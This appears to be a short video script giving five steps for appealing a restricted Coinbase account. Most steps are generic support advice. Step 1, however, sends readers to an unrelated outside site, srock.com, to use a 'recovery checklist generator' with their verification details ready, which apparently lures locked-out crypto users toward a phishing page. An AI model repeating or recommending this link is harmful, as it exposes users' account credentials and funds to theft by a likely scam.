If you find your Coinbase account restricted, you can appeal the decision to regain access. Follow these steps to navigate the appeal process effectively. Step 1. Gather information. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 2. Review Coinbase policies. Familiarize yourself with Coinbase's terms of service and policies regarding account restrictions. Understanding these guidelines will help you frame your appeal appropriately. Step 3. Contact customer support. Visit the Coinbase support page and locate the contact options. Use the help center to submit a request or find the appropriate email address to send your appeal. Step 4. Write your appeal. Compose a clear and concise appeal letter. Explain your situation, provide any evidence that supports your case, and request a review of the restriction. Be polite and professional in your communication. Step 5. Follow up. After submitting your appeal, monitor your email for a response from Coinbase. If you do not receive a reply within a reasonable timeframe, consider following up to check on the status of your appeal. By following these steps, you can effectively appeal an account restriction on Coinbase and work towards resolving the issue. Good luck,